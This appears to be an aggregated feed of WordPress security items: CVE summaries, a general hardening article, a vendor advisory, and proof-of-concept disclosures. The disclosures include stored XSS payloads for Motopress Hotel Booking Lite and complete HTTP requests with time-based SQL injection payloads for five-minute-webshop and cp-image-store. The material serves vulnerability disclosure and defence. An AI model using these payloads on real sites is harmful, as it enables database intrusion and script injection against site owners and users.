The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.

CVE-2022-1756

Cross-site scripting vulnerability exists in WP Statistics versions prior to 13.2.0 because it improperly processes a platform parameter. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the website using the product.

CVE-2022-27231: WP Statistics

By Owais Sultan
If you own a WordPress website this article is for you because it addresses WordPress security and protection…
This is a post from HackRead.com Read the original post: How To Secure WordPress Website From Cyber Attacks?

****If you own a WordPress website this article is for you because it addresses WordPress security and protection against cyber attacks.****

WordPress is a widely used CMS (content management system), powering a significant proportion of all available websites. Unfortunately, it also attracts cyber criminals who take advantage of the platform’s security flaws.

It does not mean that WordPress’s security mechanism is ineffective. Security issues can also occur due to the absence of security measures from the users’ side such as outdated or malware-infected plugins. Therefore, it is crucial to take security measures before your WordPress website becomes a target of a malicious attack.

Although you can maintain network security while transferring files by understanding the TCP vs UDP comparison and selecting the best one for web security, some valuable yet small details might help you secure your website in the long run.

*   **What Is the Importance of WordPress Website Security?**

A hacked WordPress site can significantly harm your company’s income and credibility. Cybercriminals can access passwords and user information and even exploit the site to spread malware or harvest login credentials and banking card information. Therefore, providing a secure platform for your website’s users/visitors is a must.

Also, keeping a high-end website requires maintaining your WordPress website’s safety. Website security has a direct impact on search engine visibility. And the most straightforward strategy to improve your search ranking is to improve your security. Thus, the importance of WordPress website security cannot be denied whatsoever.

*   **Is WordPress a Safe Platform?**

If this question always pops up in your mind, you are not alone. It is one of the most frequently asked questions. And the answer to this question is “Yes, it is safe.” It is safe for the most part as long as you take all necessary security precautions seriously.

*   **Avoid “Admin” Username**

The disclosure of a username may not appear to be particularly harmful. Still, it might set off a chain reaction of security flaws that can lead to account identity theft, hijacking, or financial harm.

If you have named the site’s administrator as admin, it is recommended to change it because cyber criminals are good at exploiting platforms with default setups. They understand that “admin” is frequently used as an administrator account. They may exploit that username in a “brute force” attack. Avoid the “Admin” username and save your WordPress website from such attacks.

*   **WordPress Must Be Updated Regularly**

WordPress publishes software updates regularly to enhance security and speed. These upgrades also help in keeping your site safe from cyber attacks. The most straightforward approach to improving your WordPress website’s security is to update your WordPress version. 

To see if you own the most recent WordPress version, go to Dashboard, then click on Updates.

Stay updated on the release dates for new upgrades to guarantee that your site isn’t running an old WordPress version. Moreover, try to update the plugins and themes on your WordPress site. Older plugins and themes might cause conflicts with the newly updated WordPress software, resulting in problems and security vulnerabilities.

*   **Limit the Number of Log In Times**

Cybercriminals may try to guess your admin password via a brute force attack or use leaked credentials to log in to the site. You can reduce their chances of winning by limiting the number of times they can try to log in. As a result, if someone continuously enters the incorrect password, they will be blocked for hours, months, or even years depending on what options you select.

Thus, Limit Login Attempts is a plugin that you may use to secure your website. It works by allowing you to set up a significant number of wrong passwords that may be entered before the IP address of the person who entered the wrong password is locked out.

*    **All Hotlinking Should Be Disabled**

Rather than downloading the file, putting it on your server, and providing a correct citation. Hotlinking or Inline linking is a technique of linking to a file stored on another site. It is most commonly used for images, but it may also be used for videos, music files, flash animations, and other digital content.

If you want to keep your WordPress website secure, hotlinking should be disabled. Otherwise, you’ll notice slower loading times, the possibility of more server expenses, and an increased risk of being hacked.

Although there are several manual methods for avoiding hotlinking, the most straightforward solution is to use a WordPress security plugin. The All-in-One WP Security and Firewall plugin, for example, has built-in solutions for preventing all hotlinking.

*   **Use Two-Factor Authentication**

Two-factor authentication, often known as 2FA, dual-factor authentication, or two-step verification, is a security method in which users validate their identity using two independent authentication factors. This is another smart step to include in your security strategies.

The authentication can be a conventional password followed by a security question, a combination of letters, a hidden code, or the Google Authenticator application delivering a secret code to your phone. The person who has your phone may log in to your website. It is used to safeguard a user’s credentials and the information they have access to.

**Conclusion**

Malicious actors are continuously coming up with new ways to use a company’s online presence against them, while cyber security specialists are always coming up with new ways to resist them.

This is the never-ending cycle of cybersecurity, and we’re all trapped in its center. Your WordPress site is just like any other website on the internet when it comes to cyber-attacks. However, by following the above-recommended tips and hacks, you can secure your WordPress website from cyber criminals or at least reduce the risk of being attacked. 

**More WordPress Security News**

1.  7 Tips to Increase Your WordPress Security
2.  5 WordPress Security Solutions with Free SSL Certificates
3.  Critical WordPress plugin vulnerability allowed wiping databases
4.  Flaws in 2 famous WordPress plugins put millions of websites at risk
5.  WordPress security: Steps to assess employee before granting admin access

How To Secure WordPress Website From Cyber Attacks?

WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)# Date: 2022-06-05# Exploit Author: Sanjay Singh# Vendor Homepage: https://motopress.com/# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip# Version: 4.2.4# Tested on: Windows/XAMPP###########################################################################PoC:1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type2. Click on "Add Accommodation Type".3. Add title payload= "><script>alert("XSS")</script>4. Excerpt input payload "><script>alert("XSS")</script>5. Click publish.6. Visit http://localhost/accommodations/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

WordPress Download Manager versions 3.2.42 and below suffer from a cross site scripting vulnerability.

    Description: Reflected Cross-Site ScriptingAffected Plugin: Download ManagerPlugin Slug: download-managerPlugin Developer: codename065Affected Versions: <= 3.2.42CVE ID: CVE-2022-1985CVSS Score: 6.1 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NResearcher/s: Rafie Muhammad (Yeraisci)Fully Patched Version: 3.2.43Download Manager is a file and document management plugin to help manage and control file downloads with various file download controls to restrict unauthorized file access. The plugin also provides a complete solution to sell digital products from WordPress sites, including checkout functionality to complete an order. One feature of the plugin is the ability to use a shortcode to embed files and other assets in a page or post. This function was found to be vulnerable to reflected Cross-Site Scripting.Secure coding practices would include checks to sanitize the input received by the page, and escaping that code on the output to ensure that only approved inputs and outputs are presented. Unfortunately, insufficient input sanitization and output escaping on the $_REQUEST[‘frameid’] parameter found in the ~/src/Package/views/shortcode-iframe.php file of the Download Manager plugin made it possible for an attacker to run arbitrary code in a victim’s browser by getting them to click on a specially crafted URL. This is due to the fact that the ‘frameid’ parameter was echoed to the page without sufficient user input validation.Without proper sanitization and escaping in place on user-supplied inputs, JavaScript can be used to manipulate the page. Even an unsophisticated attacker could hijack the form and use it to trick a site administrator into unknowingly disclosing sensitive information, or to collect cookie values.More specialized attackers would use this capability to gain administrator access or add a backdoor and take over the site. If the attacker gains this access, they would have access to the same information the administrator would be able to access, including user details and customer information.In the case of Download Manager, customer information and access to digital products would both be at risk. If an attacker were able to trick an administrator into clicking a link that has been designed to send session cookies to the attacker, add a malicious administrator account, or implement a backdoor on the website, the attacker would also have free reign in the administrator panel, giving them the ability to modify checkout settings and even add fake products to the website.ConclusionIn today’s post, we discussed a reflected Cross-Site Scripting (XSS) vulnerability in Download Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 3.2.43 as of this writing, as soon as possible.All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability.

WordPress Download Manager 3.2.42 Cross Site Scripting

The Note Press WordPress plugin through 0.1.10 does not sanitise and escape the id parameter before using it in various SQL statement via the admin dashboard, leading to SQL Injections

CVE-2022-1688

The Logo Slider WordPress plugin through 1.4.8 does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to an SQL Injection

CVE-2022-1687

The Five Minute Webshop WordPress plugin through 1.3.2 does not sanitise and escape the id parameter before using it in a SQL statement when editing a product via the admin dashboard, leading to an SQL Injection

**(2/2) five-minute-webshop 1.3.2 WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

May 09 2022

Affected Software

five-minute-webshop

Affected Software Type

WordPress plugin

Version

1.3.2

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-1686

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Daniel Krohmer, Shi Chen

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/five-minute-webshop

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-1686

**Vulnerability Description**

The id query parameter in five-minute-webshop 1.3.2 is vulnerable to SQL injection. An authenticated attacker may abuse the Edit functionality of the plugin to craft a malicious GET request.

**Exploitation Guide**

This exploit requires an added product. For demonstration and evaluation purposes, this is done by calling a database query within the wordpress database: INSERT INTO fmwes_products VALUES (1, "test", "test", 50, 50, 0);.

Login as admin user. This attack requires at least admin privileges.

Go to Five Minute Webshop and then hit Manage products.

Choose the previously created product and click on Edit.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of id at line 8 in ./includes/pages/edit_product.php. The final database query is called at line 10. 

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.** The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=fmwes_edit_product&id=1+AND+(SELECT+6037+FROM+(SELECT(SLEEP(5)))Uiuu) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=fmwes_products
    DNT: 1
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651742457%7CNFH9oxgPdUB0I5vQ0G9JsYZRz7fPrB6cCYyat4sPQUG%7C6af9672ff631b297870bbf4570e0d0bbb4e2fb79eb23af6720e85e7816ec4168;  PHPSESSID=ggbg3ps61166g6trc1gqkkj2cf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651742457%7CNFH9oxgPdUB0I5vQ0G9JsYZRz7fPrB6cCYyat4sPQUG%7Ce10b7e0de3a21c7ef652093e7f79ad29b7601994cdd120ec083ded4b636f3ba8; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651569658
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-1686: Security Bulletin

The Five Minute Webshop WordPress plugin through 1.3.2 does not properly validate and sanitise the orderby parameter before using it in a SQL statement via the Manage Products admin page, leading to an SQL Injection

CVE-2022-1685

The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack

**cp-image-store 1.0.67 WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

May 09 2022

Affected Software

cp-image-store

Affected Software Type

WordPress plugin

Version

1.0.67

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-1692

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Daniel Krohmer, Shi Chen

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/cp-image-store

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-1692

**Vulnerability Description**

The ordering_by query parameter in cp-image-store 1.0.67 is vulnerable to unauthenticated SQL injection. When the plugin is installed and a shortcode is placed on the blog, the respective page can be abused. An unauthenticated attacker may abuse an embedded [codepeople-image-store] shortcode and trigger the vulnerability by simply calling the blog post page with an additional malformed ordering_by query parameter.

**Exploitation Guide**

Login as admin user. Before we can launch the attack, we need to publish a post containing the affected shortcode.

Go to Image Store and click on Add New to create a new post.

Add the affected shortcode [codepeople-image-store] and hit Publish.

Use the generated permalink to access the blog post containing the shortcode.

Visit the blog post page. No authentication is required while doing this.

Clicking the previous button triggers the vulnerable request. However, it needs to be slightly modified by adding ordering_by, which is the vulnerable query parameter.

A POC may look like the following request:

Ensure that the assigned value of ordering_by is a valid member of the wp_posts table. Valid members are shown below:

In the code, the vulnerability is triggered by unsanitized user input of ordering_by at line 2420 in ./cp-image-store.php.

Finally, the database call ultimately leading to SQL injection can be found at line 2467 in ./cp-image-store.php.

**Exploit Payload**

The SQL injection can be triggered by sending the request below.

    GET /?cpis_image=379&ordering_by=post_author+and+sleep(5) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1

Tag

#wordpress